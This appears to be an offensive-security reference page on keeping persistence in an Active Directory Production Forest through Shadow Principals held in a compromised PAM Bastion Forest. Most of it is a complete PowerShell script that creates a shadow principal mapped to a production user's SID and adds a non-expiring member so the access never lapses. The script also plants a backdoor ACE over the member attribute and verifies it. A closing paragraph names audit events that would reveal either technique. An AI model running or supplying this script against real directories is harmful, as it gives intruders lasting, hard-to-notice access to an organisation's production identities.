Shadow Principals (PAM)


When a Bastion Forest is compromised, there are multiple ways to obtain persistence on the forest it manages (called the "Production Forest" here). A Shadow Principal is an msDS-ShadowPrincipal object stored under CN=Shadow Principal Configuration,CN=Services,CN=Configuration in the Bastion Forest: its msDS-ShadowPrincipalSid attribute holds the SID of a Production Forest principal, and the Bastion Forest accounts listed in its member attribute receive that SID when they authenticate to the Production Forest.
  1. Mark a low-privilege user from the Production Forest as a Shadow Security Principal in the Bastion Forest: create (or reuse) an msDS-ShadowPrincipal object whose msDS-ShadowPrincipalSid is that user's SID, and add a controlled Bastion Forest account to its member attribute.
  2. Modify a Shadow Principal Object's DACL: add ACEs over the Shadow Principal Object (at least Read Members and Write Members) that allow a controlled user to add and remove principals at will in the member attribute.
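Both steps above, as an added PowerShell example (this is not code from the original page). It assumes it runs on a Bastion Forest host with the ActiveDirectory module and enough rights to write to the Configuration naming context; the domain name prod.corp.local, the accounts lowpriv and persist and the object name SP-lowpriv are placeholders. The schemaIDGUID of the member attribute (bf9679c0-0de6-11d0-a285-00aa003049e2) is the standard AD value and is what "Read Members" and "Write Members" resolve to in an ACE.

```powershell
# Added example, not part of the original page. Names, DNs and domains are assumptions.
Import-Module ActiveDirectory

$ProdDomain  = 'prod.corp.local'   # assumed Production Forest domain (trusts the Bastion Forest)
$ProdUser    = 'lowpriv'           # assumed low-privilege Production Forest user
$BastionUser = 'persist'           # assumed controlled Bastion Forest account
$SpName      = 'SP-lowpriv'        # assumed name for the new Shadow Principal object

# Shadow Principals only work once the PAM optional feature is enabled in the Bastion Forest.
$Pam = Get-ADOptionalFeature -Filter 'name -eq "Privileged Access Management Feature"'
if (-not $Pam.EnabledScopes) { throw 'Privileged Access Management Feature is not enabled' }

# Shadow Principal objects live in this container of the Configuration NC.
$SpContainer = "CN=Shadow Principal Configuration,CN=Services,$((Get-ADRootDSE).configurationNamingContext)"

# Recon: existing Shadow Principals, the Production SID each maps to, and their members.
Get-ADObject -SearchBase $SpContainer -SearchScope OneLevel `
    -Filter 'objectClass -eq "msDS-ShadowPrincipal"' `
    -Properties 'msDS-ShadowPrincipalSid','member' |
    Select-Object Name,'msDS-ShadowPrincipalSid','member'

# Step 1: mark the Production Forest user as a Shadow Security Principal.
# The SID is resolved in the Production Forest; the object is created in the Bastion Forest.
$ProdSid = (Get-ADUser -Identity $ProdUser -Server $ProdDomain).SID
$Sp = New-ADObject -Type 'msDS-ShadowPrincipal' -Name $SpName -Path $SpContainer `
    -OtherAttributes @{ 'msDS-ShadowPrincipalSid' = $ProdSid } -PassThru

# Add the controlled Bastion account as a permanent member. PAM normally adds members as
# expiring links ("<TTL=<seconds>,<DN>>"); writing the bare DN leaves no TTL, so it never expires.
$Member = Get-ADUser -Identity $BastionUser
Set-ADObject -Identity $Sp -Add @{ 'member' = $Member.DistinguishedName }

# Step 2: grant the controlled account Read Members / Write Members on the object, i.e.
# ReadProperty + WriteProperty scoped to the 'member' attribute, so it can add and remove
# members later without needing any other privilege in the Bastion Forest.
$MemberAttrGuid = [Guid]'bf9679c0-0de6-11d0-a285-00aa003049e2'
$SpPath = "AD:\$($Sp.DistinguishedName)"
$Acl = Get-Acl -Path $SpPath
$Ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
    $Member.SID,
    [System.DirectoryServices.ActiveDirectoryRights]'ReadProperty, WriteProperty',
    [System.Security.AccessControl.AccessControlType]::Allow,
    $MemberAttrGuid)
$Acl.AddAccessRule($Ace)
Set-Acl -Path $SpPath -AclObject $Acl

# Verify: the member is present and the attribute-scoped ACE is now in the DACL.
(Get-ADObject -Identity $Sp -Properties member).member
(Get-Acl -Path $SpPath).Access |
    Where-Object { $_.ObjectType -eq $MemberAttrGuid -and $_.IdentityReference -like "*\$BastionUser" }
```

Both variants touch objects in the Configuration naming context, so a defender who audits object creation (event 5137) and attribute or nTSecurityDescriptor changes (event 5136) under CN=Shadow Principal Configuration, and who treats non-expiring member links on Shadow Principals as anomalous, sees either technique.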